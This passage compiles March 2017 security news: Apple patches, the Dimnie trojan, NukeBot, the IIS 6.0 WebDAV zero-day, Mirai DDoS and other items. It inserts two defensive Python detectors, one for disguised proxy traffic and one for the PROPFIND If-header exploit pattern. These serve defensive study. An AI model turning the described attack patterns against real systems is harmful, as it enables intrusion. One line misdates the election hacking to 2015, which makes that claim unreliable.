Moreover, the threat also concerns users who do not own any device running an Apple platform. The flaws are also contained, for example, in the Safari web browser, which is also available for Windows machines. Given the number of vulnerabilities discovered, users should certainly not delay installing the updates.

Cybercriminals are already exploiting the bugs
In some cases attackers are already exploiting the bugs, as the National Security Team CSIRT.CZ pointed out. "iOS version 10.3 then fixes a vulnerability that is already being actively exploited in an extortion campaign based on the use of JavaScript," warned Pavel Bašta, security analyst at CSIRT.CZ, which is operated by the CZ.NIC association.

"In it, the user is shown a message that their Safari browser has been blocked and that they must pay to unblock it," Bašta added.


Pro-ISIS Amaq News Site Hacked and exploited to distribute Malware
31.3.2017 securityaffairs CyberCrime

The Islamic State-affiliated Amaq news agency has been hacked and used to spread a malicious Flash Player file. Who is behind the attack?
The Islamic State-affiliated Amaq news agency has been hacked and used to spread malware. The website is considered the official news site of the Islamic State; it was used for propaganda and to share news related to the activities of the radical group.

The Amaq news agency warned that visitors were being prompted to download a malicious Flash Player file.

Just before the website was shut down, the Amaq agency released an official statement warning that Amaq's latest domain had been hacked. It is currently offline.

Amaq news Agency hacked

“The attack appears to have specifically targeted Amaq after pinning down a specific vulnerability, which indicates a more targeted attack rather than a random one,” Laith Alkhouri, Director of Research & Analysis for the Middle East and North Africa and a co-founder at cyber intelligence firm Flashpoint, told SecurityWeek. “The file might have aimed to infect machines in order to track the individuals who download the allegedly infected file rather than just merely damage their machines. The likelihood is that this attack, if ascertained, was not financially motivated.”

The Amaq news agency continues to change its domain due to takedowns by international law enforcement agencies.

At the time I was writing this, there was no attribution of the attack; the Amaq news agency is known to be a target of intelligence agencies worldwide, including the U.S. Cyber Command (CYBERCOM).

In March 2016, Senior Pentagon officials revealed the military’s first use of cyber warfare operations against the ISIL terrorist group.

The US military has started launching cyber attacks against members of the terrorist organization ISIS as part of the operation conducted to take back the Iraqi city of Mosul.

We cannot exclude that the attack is part of a cyber operation conducted by anti-ISIS groups.

In June 2016, ISIS warned its supporters that a fake version of an Amaq News Agency Android mobile app was being used to track them.

According to the experts, the cyber capabilities of the Islamic State are still relatively poor, but we cannot underestimate its growth.

During the past two years the cyber capabilities of the ISIS groups have been growing; at least five different pro-ISIS hacking groups have launched cyber-attacks in favor of the Islamic State.
According to techworm, on April 4, 2016, Cyber Caliphate Army (CCA), ISIS's main hacking unit, and other pro-ISIS groups like the Sons Caliphate Army (SCA) and Kalacnikov.TN (KTN) merged and formed The United Cyber Caliphate (UCC). These pro-ISIS activities are still poorly organized and likely under-resourced, and have been neither officially acknowledged nor claimed by ISIS itself.

Most of the attacks claimed by the pro-ISIS hackers are beginner level and opportunistic, such as exploiting known vulnerabilities to compromise websites. These pro-ISIS actors have so far launched attacks chiefly on government, banking, and media targets, but researchers at Flashpoint expect that, as they mature, they will keep targeting financial institutions.


President Donald Trump is going to extend by one year the Executive Order 13694
31.3.2017 securityaffairs BigBrothers

US President Trump is extending by one year the special powers introduced by President Obama with Executive Order 13694 on cyber security.
US President Donald Trump intends to extend by one year Executive Order 13694, which gives the US Government special powers to issue sanctions against people and organizations engaged in significant cyberattacks and cybercrime against the U.S.

Executive Order 13694 was introduced by former President Barack Obama on April 1, 2015, and was due to expire next Saturday. President Trump sent a letter to Congress yesterday informing it of his decision to keep the Order active.

“Significant malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States, continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States,” Trump wrote in the letter. “Therefore, I have determined that it is necessary to continue the national emergency declared in Executive Order 13694 with respect to significant malicious cyber-enabled activities.”

The executive order gave the U.S. new powers to retaliate for hacking against the critical infrastructure, political institutions, and US organizations.

Due to the attacks on the 2016 Presidential election, the US Government expanded the executive order in December 2016 to include voting systems and US political parties.

In December, the Order was used to sanction Russian agents and organizations for their alleged role in the cyber attacks on the Presidential Election.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russian individuals ejected by the US Government were working out of Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued on the executive order, the individuals were expelled due to the “harassment of our diplomatic personnel in Russia by security personnel and police.”


The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently with a report from US intelligence that confirms the cyber attacks against the 2015 Presidential election aimed to influence the results of the vote.

The decision to extend the existing executive order is one of the first actions the Trump Administration has taken to approach cyber security issues.

One of the issues explicitly requested in the order is a close collaboration between the Department of Commerce and Department of Defense aimed at the protection of the critical infrastructure.


Verizon to pre-install a 'Spyware' app on its Android phones to collect user data
31.3.2017 thehackernews Android

If the death of online privacy rules wasn't enough for Internet Service Providers and advertisers to celebrate, Verizon has planned to pre-install spyware on customers' Android devices in order to collect their personal data.
The telecom giant has partnered with Evie Launcher to bring a new application called 'AppFlash' — a universal search bar that will come pre-installed on the home screens of all Verizon Android handsets for quickly finding apps and web content.
AppFlash is simply a Google search bar replacement, but instead of collecting and sending telemetry data including what you search, your handset, apps and other online activities to Google, it will send them to Verizon.
What's worse? Just like other pre-installed bloatware apps, Android users can't uninstall AppFlash quickly, unless they have rooted their phone.
AppFlash allows you to search inside apps or browse through listings of nearby restaurants and entertainment. The built-in Google Search can do all of this too. So, there's nothing this app does that a Google search can’t.
Then what's the need for this app? Of course, selling your data to advertisers or other big data companies and making money — thanks to the US Senate that allowed ISPs to collect and sell your data without permission and banned the FCC from ever passing any rule that would limit these powers.
Here's what the privacy policy of AppFlash reads:
We collect information about your device and your use of the AppFlash services. This information includes your mobile number, device identifiers, device type and operating system, and information about the AppFlash features and services you use and your interactions with them.
We also access information about the list of apps you have on your device. With your permission, AppFlash also collects information about your device’s precise location from your device operating system as well as contact information you store on your device.
AppFlash information may be shared within the Verizon family of companies, including companies like AOL who may use it to help provide more relevant advertising within the AppFlash experiences and in other places, including non-Verizon sites, services, and devices.
What's more? There is a 'Suggested Apps' section on the AppFlash main screen, which means that those apps have paid Verizon a good price to list on the main screen.
How to Get Rid of ‘AppFlash’ on Your Verizon Android Phone
Users can get rid of this bloatware in two ways: you can either root your device and remove the app in question, or simply disable the app.
1. Root to remove AppFlash from Android: Since the company has made AppFlash a default app on the home screen of its Android handsets to help users search content and browse the internet, the app cannot be uninstalled.
So, in order to uninstall AppFlash, you are required to root your Android device and then delete the app from your storage memory.
2. Disable AppFlash without Root: Since rooting is a dangerous process that voids your device warranty, you can simply disable AppFlash.
Disabling bloatware apps on newer phones is easy, as Android has a built-in way to do this, which doesn't require any root access.
Just head on to Settings → Apps (or 'Applications' on some phones) → AppFlash. Now open it and click 'Disable,' 'Force Stop' and then 'Clear Data' as well.


Energy grids have problems detecting cyberattacks, experts say

31.3.2017 SecurityWorld ICS
According to experts at Kaspersky Lab, energy grids lack sufficiently strong built-in cybersecurity functions, so they are highly susceptible to more sophisticated security threats whose detection is rarely trivial.

According to Kaspersky Lab, today's electrical distribution grids are an intricate system with integrated automation and control functions; because communication takes place over open protocols and the grid lacks sufficiently strong built-in cybersecurity functions, they are highly susceptible to more sophisticated security threats.

According to the survey, 92% of industrial control systems (ICS) with external access use open and unsecured Internet communication protocols. Moreover, since 2010 the number of vulnerable ICS components has increased by a factor of 10, which makes these devices easy and lucrative targets for cybercriminals.

Almost half of energy and other utility companies reportedly admit that they have major problems detecting sophisticated attacks.

According to Kaspersky, one solution is to deploy Industrial CyberSecurity for Energy, a package of solutions for organizations operating in the energy industry. According to the vendor, this suite protects control centers at the SCADA level and Substation Automation Systems at all levels, including the upper automation level, which covers servers, HMIs, gateways and engineering workstations.

Secondary automation devices are also protected: protective relays, bay controllers, merging units, RTUs and other substation devices, process-level IEDs and the entire network infrastructure.

The solution also offers a range of advanced technologies for protecting industrial nodes and network infrastructure. Within the network infrastructure, the solution provides network monitoring and integrity control with deep application protocol inspection (including IEC 60870-5-104, IEC 61850 and other standards and protocols relating to electrical infrastructure).


Widespread Email Scam Targets Github Developers with Dimnie Trojan
30.3.2017 thehackernews Virus


Open source developers who use the popular code-sharing site GitHub were put on alert after the discovery of a phishing email campaign that attempts to infect their computers with an advanced malware trojan.
Dubbed Dimnie, the reconnaissance and espionage trojan has the ability to harvest credentials, download sensitive files, take screenshots, log keystrokes on 32-bit and 64-bit architectures, download additional malware on infected systems, and self-destruct when ordered to.
The malware has largely flown under the radar for the past three years, thanks to its stealthy command and control methods.
The threat was discovered in mid-January this year when it was targeting multiple owners of GitHub repositories via phishing emails, but cyber-security firm Palo Alto Networks, which reported the campaign on Tuesday, says the attacks started a few weeks before.
Here's How the Attack Works:
The attack starts by spamming the email inboxes of active GitHub users with booby-trapped job offers. The messages used in this campaign attempt to trick the victims into running an attached malicious .doc file.
The doc file contains embedded macro code, which if allowed, executes a PowerShell command to download and install the Dimnie trojan – malware that can be controlled remotely, enabling attackers to hijack infected PCs and install additional malware.
Dimnie is not new; it first appeared in early 2014, but the use of stealthy command and control (C&C) methods in the new version of the Dimnie malware helped the threat remain unnoticed until this year.
Dimnie's Stealthy Features Let It Go Undetected for 3 Years
This new iteration has the ability to hide its malicious traffic under fake domains and DNS requests. To camouflage its connection, Dimnie uses HTTP Proxy requests that appear to be sent to Google-owned domains, but it's actually talking to an address controlled by the attackers, which has nothing to do with Google.
For more stealthiness, the malware encrypts all of its modules during transit, and once they are received and decrypted on the targeted computer, they are never written to or executed on its hard drive.
Instead, Dimnie injects them directly into the memory of core Windows processes, which then execute in the OS memory itself, without leaving traces on the user's disks. This lets Dimnie operators inject their malicious module into the process of any legitimate application.
"The global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous Dimnie targeting tactics. Multiple factors have contributed to Dimnie's relatively long-lived existence," Palo researchers concluded.
"By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown."
Since the malware hides its communications behind regular traffic and executes in the OS memory, Palo Alto researchers were unable to identify the attackers behind the latest phishing email campaign or their exact motivations for targeting open-source developers.
However, gaining access to computers belonging to owners of private GitHub repositories gives attackers a way to access the source code of the applications they manage for their organizations, which could let the attackers gain access to the internal networks of various organizations.
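The disguise described above (proxy-style requests that name a Google domain but go to an attacker-controlled address) can be caught from the defender's side by comparing the request target with the actual destination. The following is an added example, not code from the article or from Palo Alto Networks; the record layout, the sample records and the proxy allow-list are constructed for the illustration.

```python
"""Flag proxy-style HTTP requests that name a Google domain but are sent
to a host that is not one of the network's sanctioned forward proxies.

Added example, not code from the original article or from Palo Alto
Networks. The record layout, the sample records and the proxy allow-list
are constructed for this illustration; real proxy or flow logs would
need their own loader."""
from urllib.parse import urlsplit

# Assumption: the only hosts on this (hypothetical) network that should ever
# receive absolute-URI request lines are the explicit forward proxies.
SANCTIONED_PROXIES = {"10.0.0.8"}

# Assumption: domain suffixes treated as Google-owned for this check.
GOOGLE_SUFFIXES = ("google.com", "googleapis.com", "gstatic.com",
                   "googleusercontent.com")


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into its parts; None when malformed."""
    parts = line.split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0].upper(), parts[1], parts[2]


def is_absolute_form(target):
    """True for proxy-style targets such as 'http://host/path'."""
    return target.lower().startswith(("http://", "https://"))


def looks_google(host):
    """True when host is one of the Google suffixes or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in GOOGLE_SUFFIXES)


def classify(record):
    """Return a reason string if the record is suspicious, else None.

    record keys: src_ip, dst_ip, request_line (all constructed strings)."""
    parsed = parse_request_line(record["request_line"])
    if parsed is None:
        return "malformed request line"
    _method, target, _version = parsed
    if not is_absolute_form(target):
        return None      # origin-form request: ordinary direct web traffic
    if record["dst_ip"] in SANCTIONED_PROXIES:
        return None      # absolute form is expected when talking to a real proxy
    host = urlsplit(target).hostname or ""
    if looks_google(host):
        return ("proxy-style request for %s sent to non-proxy host %s"
                % (host, record["dst_ip"]))
    return ("proxy-style request for %s sent to unknown host %s"
            % (host, record["dst_ip"]))


def scan(records):
    """Run classify over every record; return (src_ip, reason) for each hit."""
    hits = []
    for record in records:
        reason = classify(record)
        if reason is not None:
            hits.append((record["src_ip"], reason))
    return hits


# Constructed sample records (documentation-range addresses, not real hosts).
SAMPLE_RECORDS = [
    {"src_ip": "10.0.0.21", "dst_ip": "93.184.216.34",
     "request_line": "GET /index.html HTTP/1.1"},             # normal browsing
    {"src_ip": "10.0.0.21", "dst_ip": "10.0.0.8",
     "request_line": "GET http://www.google.com/ HTTP/1.1"},   # via the real proxy
    {"src_ip": "10.0.0.33", "dst_ip": "203.0.113.45",
     "request_line": "GET http://www.google.com/search?q=x HTTP/1.1"},  # disguised
    {"src_ip": "10.0.0.33", "dst_ip": "198.51.100.7",
     "request_line": "POST http://mail.google.com/ HTTP/1.1"},  # disguised upload
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_RECORDS):
        print(src, reason)
```

The heuristic only works where egress policy already forces web traffic through known proxies; on a network with direct Internet access the destination-versus-target comparison needs DNS resolution of the named host as a second signal.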


Audit Finds Over a Dozen NTP Vulnerabilities

30.3.2017 securityweek  Vulnerebility

Researchers at Germany-based security firm Cure53 have conducted a 32-day audit of the Network Time Protocol (NTP) and the NTPsec project and discovered more than a dozen vulnerabilities.

Experts identified a total of 16 security-related issues, including 8 weaknesses that only affect NTP and two that only impact NTPsec, which is meant to be a secure, hardened and improved implementation of NTP. Cure53 has published separate reports focusing on the NTP and NTPsec problems.

The Network Time Foundation addressed the flaws earlier this month with the release of ntp-4.2.8p10.

Cure53 has classified one vulnerability as being critical. CVE-2017-6460, which only affects NTP, has been described as a stack-based buffer overflow that can be triggered by a malicious server when a client requests the restriction list. The flaw can be exploited to cause a crash and possibly to execute arbitrary code.

The security holes rated by Cure53 as high severity are CVE-2017-6463 and CVE-2017-6464, both of which can be exploited for DoS attacks.

It’s worth noting that while some of the vulnerabilities have been classified as critical and high severity by Cure53, NTP developers have only assigned medium, low and informational-level severity ratings to the discovered flaws.

Ntp-4.2.8p10 patches a total of 15 vulnerabilities and also includes just as many non-security fixes and improvements. Of the 15 security holes resolved in the latest version, 14 were discovered by Cure53, which also noticed that a flaw initially patched in December 2014 was reintroduced in November 2016.

One of the vulnerabilities fixed in ntp-4.2.8p10 was reported by researchers at Cisco Talos. Experts identified a DoS vulnerability affecting the origin timestamp check functionality. The company has published a blog post and a technical advisory describing the issue.

This is not the only audit conducted recently by Cure53. In the past months, the company also analyzed the cURL data transfer tool and the Dovecot email server.


iOS Scareware Campaign Abuses Safari Vulnerability

30.3.2017 securityweek iOS 
One of the vulnerabilities addressed by Apple this week with the release of iOS 10.3 had been abused by scammers to run a scareware campaign, Lookout researchers warn.

The mobile security firm discovered that cybercriminals were abusing the handling of pop-up dialogs in Mobile Safari in a way that allowed them to lock victims out of the browser. Attackers extorted money from their victims, demanding iTunes Gift Cards and were displaying threatening messages to the victims, in an attempt to scare them into paying.

The issue, Lookout explains, was that the manner in which Mobile Safari was handling website pop-up dialogues affected the entire application rather than only the tab in which the site was opened. Starting with iOS 10.3, these dialogues can no longer affect the entire app.

By blocking the browser, the attackers were attempting to scare users into believing their data has been encrypted, but the attack could be easily thwarted. Any knowledgeable user could simply head to the iOS settings and clear the browser’s cache to restore functionality.

Conducted via several related websites, the attack was discovered last month, when a user reported losing control of Safari after visiting a web page. An overlaid “Cannot Open Page” dialog from Safari prompted the user to tap OK, but the dialogue would reappear in an infinite loop. A “Your device has been locked…” message also appeared.

The attack was contained within the app sandbox and no exploit code was being used, but attackers effectively abused fear as the main factor of convincing victims to pay before they realized there was no actual risk.

“The scammers registered domains and launched the attack from the domains they owned, such as police-pay[.]com, which the attackers apparently named with the intent of scaring users looking for certain types of material on the Internet into paying money. Examples range from pornography to music-oriented websites,” the researchers explain.

Lookout determined that the attack appears to have been developed for older versions of iOS, but the abuse of pop-ups in Mobile Safari was still possible until iOS 10.3. Apple has patched the issue in a way that prevents similar pop-ups from blocking the entire application. This means that users can now close a tab that is misbehaving.

The security content of iOS 10.3 included patches for 83 other vulnerabilities. Additionally, Apple patched flaws in macOS, watchOS, tvOS, Safari, and various macOS and iOS software.


Are you searching for stolen US University email credentials? Search on the Dark Web
30.3.2017 securityaffairs Crime

According to a new research published by the nonprofit DCA, millions of stolen US University email credentials are available for sale on the Dark Web.
According to a new research published by the nonprofit Digital Citizens Alliance (DCA) that searched the Dark Web for credentials from the top 300 US universities, millions of stolen email credentials are available for sale.
Stolen email credentials from the largest US universities are a precious commodity on the Dark Web, where crooks are offering them for prices ranging from $3.50 to $10 apiece.

The researchers, supported by the research firm ID Agent, found 13,930,176 credentials from those big schools, mostly from the University of Michigan (122,556), Penn State (119,350), University of Minnesota (117,604), Michigan State (115,973), and Ohio State (114,032).


MIT has the highest ratio of stolen and spoofed email addresses to enrolled students and staff, 2.81:1, followed by Carnegie Mellon University (2.4:1) and Cornell University (2.39:1).

“I’ve been scraping the Dark Web since 2009. There were 2.2 million .edu [emails] there back in 2015, 2.8 million in 2016, and now almost 14 million a year later. That’s a significant spike,” explained Brian Dunn, managing partner at ID Agent.

According to the researchers, the huge amount of stolen records was obtained through third-party website breaches, and during 2016 the number of data breaches was very high.

“There have been significant third-party breaches in 2016,” said Dunn. ID Agent observed a 547% increase in all types of stolen credentials offered for sale in the Dark Web over the past three years.

According to the DCA, the report only analyzed credentials belonging to the major US universities, so sellers on the dark net may also be offering credentials for other, smaller universities.

“[The] .edu [domain] is a generally valuable email domain just like .gov and .mil,” Dunn concluded.


Nuclear Bot source code leaked online, a new threat will rapidly spread in the wild
30.3.2017 securityaffairs BotNet

The source code for a new banking Trojan dubbed Nuclear Bot was leaked online, experts speculate a rapid diffusion of the threat in the wild.
The source code for a new banking Trojan, dubbed Nuclear Bot, is available for sale in the cyber criminal underground. The Nuclear Bot banking Trojan first appeared in the cybercrime forums in early December when it was offered for $2,500. The malicious code implements features commonly seen in banking Trojans: it is able to inject code into the Mozilla Firefox, Internet Explorer and Google Chrome browsers and steal sensitive data provided by the users.

“In early December 2016, IBM X-Force researchers noticed the emergence of a new banking malware advertised for sale in a few underground boards.” reads a blog post published by IBM researchers who are following the evolution of the threat. “The malware’s vendor, who went by the online moniker Gosya, was a Russian-speaking member who introduced himself as the developer of Nuclear Bot, or NukeBot, a modular banking Trojan.”

The Trojan can also open a local proxy or hidden remote desktop service to allow crooks to initiate rogue transactions through the victims’ browsers after they have been tricked into providing the second authentication factor.


According to IBM, the creator of the malware has lost his credibility over the months and has been flagged as a scammer in the hacking community. The malware author did not offer a test version of the malware to potential buyers and advertised the Nuclear Bot using different names on different cybercrime forums.

In order to gain credibility and notoriety in the cyber crime community, the author of the malware decided to release the Trojan’s source code.

The release of malicious code online represents an important milestone in the malware life cycle because it gives other malware developers and criminal organizations the opportunity to customize and distribute their own version of the malware.

The NukeBot Trojan appears to be a powerful tool written from scratch that was able, in early-stage attacks, to avoid detection by antivirus solutions.

“We know from previous incidents, such as the Zeus, Gozi and Carberp leaks, that publicly available source code makes for more malware. This is often incorporated into existing projects. X-Force researchers noted that NukeBot is likely to see the same process take place in the wild, especially since its code is not copied from other leaked malware, per the developer’s claims.” continues IBM.

“At this time, NukeBot has not been detected in real-world attacks and does not have defined target lists.”

Security experts expect that a growing number of players in the cybercrime underground will start offering the NukeBot Trojan through the consolidated sales model known as malware-as-a-service.


Over 8.3 million live websites using IIS 6.0 are affected by a Zero-Day
30.3.2017 securityaffairs Vulnerebility

Millions of websites are affected by a buffer overflow zero-day vulnerability, tracked as CVE-2017-7269, that resides in the IIS 6.0.
The IIS 6.0 zero-day flaw was discovered by two researchers with the Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China, who published PoC exploit code on GitHub.

Microsoft has already acknowledged the vulnerability that was exploited in the wild in July or August 2016.

More than 8 million websites could be affected by the flaw that resides in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0.

The issue is caused by the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to trigger a denial of service condition or to run arbitrary code.

“Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269) due to an improper validation of an ‘IF’ header in a PROPFIND request.” reads the analysis published by Trend Micro.


“A remote attacker could exploit this vulnerability in the IIS WebDAV Component with a crafted request using PROPFIND method. Successful exploitation could result in denial of service condition or arbitrary code execution in the context of the user running the application.”

The Web Distributed Authoring and Versioning (WebDAV) extension of the HTTP protocol allows clients to perform remote Web content authoring operations. It extends HTTP with additional methods, including COPY, LOCK, MKCOL, PROPFIND, and UNLOCK.

“This vulnerability is exploited using the PROPFIND method and IF header. The PROPFIND method retrieves properties defined on the resource identified by the Request-URI. All the WebDAV-Compliant resources must support the PROPFIND method.” continues the analysis.

The impact of this vulnerability is wide: according to data provided by W3Techs, Microsoft’s IIS is currently the third most popular web server solution in the wild (11.4% of all websites). IIS 6.0 accounts for 11.3% of those, roughly 1.3% of all websites on the Internet.

The vulnerability doesn’t affect newer versions of Microsoft Internet Information Services.

According to BuiltWith, IIS 6.0 is currently used by 2.3% of the entire Internet, meaning over 8.3 million live websites are using IIS 6.0.

In order to mitigate the risk of cyber attacks, it is possible to disable the WebDAV service on IIS 6.0 installations.

“To mitigate the risk, disabling the WebDAV service on the vulnerable IIS 6.0 installation is recommended. Newer versions of Windows Server shipped with newer versions of IIS are not affected by this vulnerability.” concluded Trend Micro.


Imperva observed a new variant of the Mirai botnet unleashing a 54-hour DDoS attack
30.3.2017 securityaffairs Attack

According to security experts at Imperva, a newly discovered variant of the Mirai botnet was used to power a 54-hour DDoS attack.
According to security experts at Imperva, a newly discovered variant of the dreaded Mirai botnet was used to power a 54-hour distributed denial of service (DDoS) attack.

The new variant of the Mirai botnet was observed targeting a customer of the company, a US college. The DDoS attack peaked at around 37,000 RPS, the experts highlighted that this is the highest of any Mirai botnet previously detected.

“The attack, which started on February 28 and ran for 54 hours straight, targeted one of our customers, a US college.” reads the blog post published by Incapsula.

“The average traffic flow came in at over 30,000 RPS and peaked at around 37,000 RPS—the most we’ve seen out of any Mirai botnet. In total, the attack generated over 2.8 billion requests.”


The Mirai malware was spotted by the researcher MalwareMustDie in August 2016, it was specifically designed to target IoT devices.

It infected thousands of routers and IoT devices, including DVRs and CCTV systems. When the Mirai bot infects a device, it chooses random IPs and attempts to log in via the Telnet and SSH ports using a list of admin credentials.

The Mirai botnet was used last year in two large attacks against the website of the popular investigator Brian Krebs and the Dyn DNS service. In October, the source of the Mirai bot was leaked online and new variants were spotted in the wild.

A reference to the malicious code was spotted by Brian Krebs on the popular criminal hacker forum Hackforum. The Hackforum user with moniker “Anna-senpai” shared the link to the source code of the malware “Mirai.”

In January 2017, experts spotted a new Windows variant of Mirai allegedly used to spread the Linux Trojan to more IoT devices.

The experts at Imperva speculate the attack was powered by a variant developed from the leaked source code. Previous versions of the Mirai botnet powered network layer DDoS attacks; the new variant launched application layer assaults instead.

The experts determined that the botnet used to launch the attack was mostly composed of CCTV cameras, DVRs and routers. The researchers speculate the IoT devices might have been compromised through known vulnerabilities that the botnet reached via open Telnet (23) and TR-069 (7547) ports.

“Based on a number of signature factors, including header order, header values and traffic sources, our client classification system immediately identified that the attack emerged from a Mirai-powered botnet,” continues the blog post published by Imperva.

The DDoS bots used in the attack used different user-agents instead of the five previously seen hardcoded in the default Mirai version. This technical detail suggests the new variant of the Mirai botnet might have been improved to power more sophisticated application layer attacks.

“Overall, in the course of the attack, we spotted the following 30 user-agent variants” continued the post.

The analysis of the traffic originating from 9,793 IPs worldwide, revealed that more than 70% of the devices were located in the following countries: United States (18.4%), Israel (11.3%), Taiwan (10.8%), India (8.7%), Turkey (6%), Russia (3.8%), Italy (3.2%), Mexico (3.2%), Colombia (3.0%), and Bulgaria (2.2%).

“Less than a day after the initial assault ended, another one began that lasted for an hour and a half with an average traffic flow of 15,000 RPS. Based on our experience, we expect to see several more bursts before the offender(s) finally give up on their efforts,” concluded the post.


Millions of Websites Affected by IIS 6.0 Zero-Day

29.3.2017 securityweek Vulnerebility
More than 8 million websites could be exposed to a buffer overflow vulnerability in Internet Information Services (IIS) 6.0 that has been exploited in the wild since July 2016, researchers warn.

The bug was found in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0. The issue, tracked as CVE-2017-7269, resides in the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to cause denial of service or to run arbitrary code.

Discovered by two researchers with the Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China, the vulnerability was exploited in the wild in July or August 2016. This week, the researchers published a proof-of-concept on GitHub and revealed that Microsoft has already acknowledged the bug.

The WebDAV extension of the HTTP protocol allows clients to perform remote Web content authoring operations, offering support for new HTTP methods, including COPY, LOCK, MKCOL, PROPFIND, and UNLOCK.

The exploit abuses the PROPFIND method and IF header. The former, Trend Micro’s Virendra Bisht explains, “retrieves properties defined on the resource identified by the Request-URI” and is supported by all WebDAV-Compliant resources, while the latter “handles the state token as well as the ETags.”

According to Bisht, “the vulnerability could be exploited with an overly large ‘IF’ header in the ‘PROPFIND’ request with at least two http resource in the IF header.” The researcher also explains that, while successful attacks could lead to remote code execution, unsuccessful attacks could sometimes lead to denial of service conditions.

Data from W3Techs reveals that Microsoft’s IIS is currently the third most popular web server technology out there, powering 11.4% of all websites. While newer versions of Microsoft’s technology are more popular, IIS 6.0 still accounts for 11.3% of the IIS-powered websites, which results in 1.3% of all websites out there being powered by this version.

According to BuiltWith, however, IIS powers 13.8% of all live websites, while the IIS 6.0 version is used by 2.3% of the entire Internet. This means that over 8.3 million live websites are using IIS 6.0, including tens of thousands of the most popular sites out there. However, the number is constantly dropping.

Disabling the WebDAV service on the vulnerable IIS 6.0 installations can mitigate the risk posed by this vulnerability, Trend Micro’s researcher says. The flaw does not affect newer versions of IIS.

Because IIS 6.0 was included with Windows Server 2003, an old operating system version that is no longer supported by Microsoft, it’s unlikely that a patch will be released for this zero-day.

“Nobody should be running IIS 6 in 2017. This is unsupported and unsafe software and must be upgraded ASAP," Craig Young, Principal Security Researcher for Tripwire, told SecurityWeek. "All vulnerabilities in this software are going to be zero-day forever and while there may be mitigations for this attack, it is incredibly risky to run obsolete software on the Internet.”
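Both articles on CVE-2017-7269 (the one above and the earlier "Over 8.3 million live websites" piece) describe the same request shape: a PROPFIND with an overly large If header carrying at least two http resource tags. The following is an added example of a front-end check for that shape, not code from the articles, Trend Micro or Microsoft; the length and tag-count thresholds and the sample requests are constructed assumptions, and the articles' own mitigation remains disabling WebDAV on IIS 6.0.

```python
"""Request-level check for the PROPFIND / If-header pattern of CVE-2017-7269.

Added example, not code from the original articles, Trend Micro or Microsoft.
The length threshold, the tag-count threshold and the sample requests are
constructed assumptions; this check only helps spot the request shape in front
of a server whose real fix is to disable WebDAV (or retire IIS 6.0)."""
import re

IF_HEADER_MAX_LEN = 1024   # assumption: real lock-token If headers are far shorter
MAX_RESOURCE_TAGS = 1      # assumption: one <http://...> tagged list per request

# RFC 4918 tagged-list syntax: <Resource-Tag> (<lock token> ...)
RESOURCE_TAG = re.compile(r"<\s*https?://[^>]*>", re.IGNORECASE)


def parse_request(raw):
    """Parse the head of an HTTP/1.x request into (method, target, headers).

    Header names are lower-cased; duplicate headers are joined with ', ',
    so the check sees the combined value a server would process."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _colon, value = line.partition(":")
        name = name.strip().lower()
        value = value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return method.upper(), target, headers


def assess_propfind(method, headers):
    """Return the reasons a request matches the vulnerable pattern ([] if none)."""
    reasons = []
    if method != "PROPFIND":
        return reasons                  # the flaw is only reachable via PROPFIND
    if_header = headers.get("if")
    if if_header is None:
        return reasons
    if len(if_header) > IF_HEADER_MAX_LEN:
        reasons.append("If header length %d exceeds %d"
                       % (len(if_header), IF_HEADER_MAX_LEN))
    tag_count = len(RESOURCE_TAG.findall(if_header))
    if tag_count > MAX_RESOURCE_TAGS:
        reasons.append("If header carries %d http resource tags" % tag_count)
    return reasons


def should_block(raw):
    """Front-end decision: drop the request when any reason is present."""
    method, _target, headers = parse_request(raw)
    return bool(assess_propfind(method, headers))


# Constructed samples. The second one uses an 'x' filler inside the lock token
# merely to exceed the length threshold; it is not an exploit payload.
BENIGN_PROPFIND = (
    "PROPFIND /docs/ HTTP/1.1\r\n"
    "Host: files.example\r\n"
    "Depth: 1\r\n"
    "If: <http://files.example/docs/> "
    "(<opaquelocktoken:f81d4fae-7dec-11d0-a765-00a0c91e6bf6>)\r\n"
    "Content-Length: 0\r\n\r\n")

SUSPICIOUS_PROPFIND = (
    "PROPFIND /docs/ HTTP/1.1\r\n"
    "Host: files.example\r\n"
    "If: <http://files.example/a> (<opaquelocktoken:a>) "
    "<http://files.example/b> (<opaquelocktoken:" + "x" * 1500 + ">)\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_PROPFIND), ("suspicious", SUSPICIOUS_PROPFIND)):
        method, _t, headers = parse_request(raw)
        print(name, assess_propfind(method, headers))
```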


Police Arrest Man Potentially Linked to Group Threatening to Wipe Millions Of iPhones
29.3.2017 thehackernews  Apple
The British authorities have reportedly arrested a 20-year-old man, potentially a member of the cyber criminal gang 'Turkish Crime Family' which threatened Apple last week to remotely wipe data from millions of iOS devices unless Apple pays a ransom of $75,000.
